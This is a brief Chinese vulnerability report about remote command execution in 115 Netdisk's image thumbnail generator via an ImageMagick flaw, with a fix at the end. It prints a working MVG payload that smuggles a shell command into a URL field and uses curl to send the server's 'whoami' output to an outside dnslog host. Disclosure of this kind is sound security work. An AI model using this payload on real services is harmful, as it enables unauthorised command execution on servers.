首页 > 安全 > 网站安全 >

115网盘命令执行漏洞

2016-06-20

凑个热闹 115网盘上的一个应用场景,回想起来115网盘上传文件后会产生缩略图预览,那会不会有问题呢?还是提交那几行代码:push graphic-contextviewbox 0 0 640 480fill & 039;url(https: "|curl htt

凑个热闹

115网盘上的一个应用场景,回想起来115网盘上传文件后会产生缩略图预览,那会不会有问题呢?

还是提交那几行代码:

push graphic-context

viewbox 0 0 640 480

fill 'url(https://"|curl https://`whoami`.xxx.dnslog.info")'

pop graphic-context

发现没有判断文件格式直接进行了转换:

11.png

cloudeye显示:

22.png

cloudeye显示:

22.png

11.png

解决方案:

1.升级imagick

2.科学地说,生成预览之前请判断合适的文件头

相关文章
最新文章
热点推荐